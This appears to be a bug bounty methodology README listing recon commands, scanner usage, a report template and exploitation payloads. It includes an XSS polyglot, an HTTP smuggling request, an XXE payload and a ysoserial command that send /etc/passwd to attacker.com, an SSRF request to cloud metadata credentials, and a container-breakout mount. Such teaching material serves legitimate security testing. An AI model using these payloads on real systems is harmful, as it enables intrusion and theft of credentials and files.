A comprehensive collection of methodologies, tools, and techniques for modern bug hunters (2025 Edition)
Free resources for everyone to become a better bug hunter
Stay curious, hack ethically, and share knowledge freely!
- Introduction
- Reconnaissance Techniques
- Vulnerability Discovery
- Exploitation
- Post-Exploitation
- Reporting
- Resources
- Tools
- Contributing
- License
This repository contains a carefully curated collection of advanced methodologies, cutting-edge tools, and proven techniques for bug bounty hunting. Whether you're a beginner or an experienced security researcher, this resource will help elevate your hacking skills to the next level.
Why Bug Bounty Hunting?
- Legal Way to Hack: Practice your skills in a legitimate environment
- Financial Rewards: Earn bounties while learning
- Career Growth: Build your resume with real-world experience
- Community: Join a global community of security researchers
- Impact: Help make the internet more secure for everyone
Use a combination of these techniques for maximum coverage:
# Passive recon using multiple tools
subfinder -d target.com -all | anew subdomains.txt
amass enum -passive -d target.com | anew subdomains.txt
github-subdomains -d target.com -t GITHUB_TOKEN | anew subdomains.txt
# Permutation scanning
dnsgen subdomains.txt | puredns resolve -r resolvers.txt | anew resolved.txt
# Advanced brute forcing
ffuf -u https://FUZZ.target.com -w wordlist.txt -mc 200,403,301,302,307 -o ffuf_results.txtcat resolved.txt | aquatone -out ./aquatone
gowitness file -f resolved.txt -P ./screenshots --no-httpπ Comprehensive Asset Discovery
-
API Endpoint Discovery
katana -u target.com -jc | grep -E "api|graphql|v1|v2|v3" | anew api_endpoints.txt
-
JavaScript Analysis
nuclei -t js-endpoints.yaml -l resolved.txt -o js_endpoints.txt
-
Cloud Assets Discovery
cloudlist -o cloud_assets.txt -t target.com s3scanner scan -f domains.txt
-
CI/CD Environment Enumeration
gitGraber -k keywords.txt -q "org:targetorg" nuclei -t cicd-exposed.yaml -l resolved.txt -
Mobile App Reverse Engineering
jadx -d output_dir target.apk grep -r "https://" ./output_dir
| Category | Vulnerability | Detection Method |
|---|---|---|
| API | GraphQL Introspection | graphw00f -t https://api.target.com/graphql |
| Auth | OAuth 2.0 Misconfiguration | nuclei -t oauth-misconfiguration.yaml -l endpoints.txt |
| Client-Side | DOM Clobbering | gxss -u "https://target.com/?param=FUZZ" -p payloads.txt |
| Server-Side | Server Side Template Injection | tplmap -u "https://target.com/?param=FUZZ" |
| Access Control | JWT Vulnerabilities | jwt_tool.py -M at -t "JWT_TOKEN" |
| Supply Chain | Dependency Confusion | dependency-check --scan node_modules |
π Advanced Testing Techniques
-
XSS Polyglots for Bypassing WAFs
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
-
Race Condition Testing
turbo-intruder race_condition.py https://target.com/api/endpoint
-
Advanced SSRF to RCE Chains
# Use Interactsh for SSRF detection interactsh-client # Then use the generated URL in your SSRF payloads # Example: https://target.com/api/fetch?url=http://INTERACTSH_URL/ssrf
-
GraphQL Query Batching Attack
[{"query":"query{user{id name email}}","variables":null},{"query":"query{systemInfo}","variables":null}] -
HTTP Request Smuggling
POST / HTTP/1.1 Host: target.com Transfer-Encoding: chunked Transfer-encoding: cow 0 GET /admin HTTP/1.1 Host: target.com
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;]>Evil.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;
%send;# Time-based blind SQLi automation
sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 --batch --time-sec=1
# Second-order SQL injection
sqlmap -u "https://target.com/page1" --data="username=test&password=test" --second-url="https://target.com/page2" --second-req=req.txtπ Zero-Day Hunting Techniques
-
Source Code Mining for Vulnerabilities
trufflehog --regex --entropy=False --max_depth=50 https://github.com/target/repo
-
Protocol-Level Fuzzing
# HTTP/2 Fuzzing h2csmuggler -u https://target.com/ -
Custom Deserialization Exploits
// Java deserialization payload generation java -jar ysoserial.jar CommonsCollections5 'curl attacker.com/$(cat /etc/passwd)' > payload.bin
-
WebSocket Security Testing
# Using wscat to connect to WebSocket wscat -c wss://target.com/ws # Then send payloads to test for vulnerabilities
-
IoT Firmware Analysis
binwalk -e firmware.bin grep -r "password" ./firmware_extracted/
# Internal Service Discovery
curl internal-api.target.com/v1/users
# SSRF to access cloud metadata
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/π Internal Network Pivoting
-
Container Breakout Techniques
# Check if you're in a container cat /proc/1/cgroup # Mount host filesystem mkdir -p /tmp/host mount /dev/sda1 /tmp/host
-
JWT Token Pivoting
# Extract and modify JWT to escalate privileges jwt-cracker <token> [alphabet] [attempts]
-
Using GraphQL for Internal Recon
query { __schema { types { name fields { name description } } } }
# Vulnerability Report
## Overview
[Brief description of the vulnerability]
## Severity
[Critical/High/Medium/Low]
## Steps to Reproduce
1. [Step 1]
2. [Step 2]
3. [Step 3]
## Impact
[Describe what an attacker could do with this vulnerability]
## Proof of Concept
[Include screenshots, code, or videos]
## Remediation
[Recommendations for fixing the issue]π Tips for Better Reports
-
Chain Multiple Vulnerabilities
- Show how combining low-severity issues can lead to critical impact
-
Include Business Impact
- Explain how the vulnerability affects the company's business
-
Create Proof of Concept Code
- Make it easy for the team to reproduce your findings
-
Provide Clear Remediation
- Give actionable advice on how to fix the issue
-
Follow Up Responsibly
- Be patient and professional in your communications
- Real-World Bug Hunting by Peter Yaworski
- The Web Application Hacker's Handbook by Dafydd Stuttard
- Bug Bounty Bootcamp by Vickie Li
- Hands-On Bug Hunting by Joseph Marshall
For a complete list of tools, see tools list.txt
π New Tools (2025)
-
Nuclei v3
- Advanced vulnerability scanner with machine learning capabilities
nuclei -u https://target.com -t nuclei-templates
-
Katana v2
- Crawling and spidering framework with JS rendering
katana -u https://target.com -jc -fs screens
-
Jaeles v2
- Advanced web application scanner
jaeles scan -u https://target.com -s 'cves/,common/'
-
httpx v2
- Enhanced HTTP toolkit
httpx -l domains.txt -title -tech-detect -status-code
-
Feroxbuster
- Fast content discovery tool
feroxbuster -u https://target.com -w wordlist.txt
-
GF Patterns
- Pattern matcher for various vulnerabilities
cat urls.txt | gf xss
-
dnsx
- Fast and multi-purpose DNS toolkit
dnsx -l domains.txt -a -resp
-
Notify
- Notification service for bug bounty workflows
notify -data "Target: example.com: XSS found"
-
ParamSpider
- Mining parameters from web archives
python3 paramspider.py -d target.com
-
Dalfox v3
- Advanced XSS scanner
dalfox url https://target.com?param=test
Contributions are welcome! Please feel free to submit a Pull Request, open an Issue, or suggest new resources.
This project is licensed under the MIT License - see the LICENSE file for details.
Knowledge should be free and accessible to all.
Happy hacking! π₯
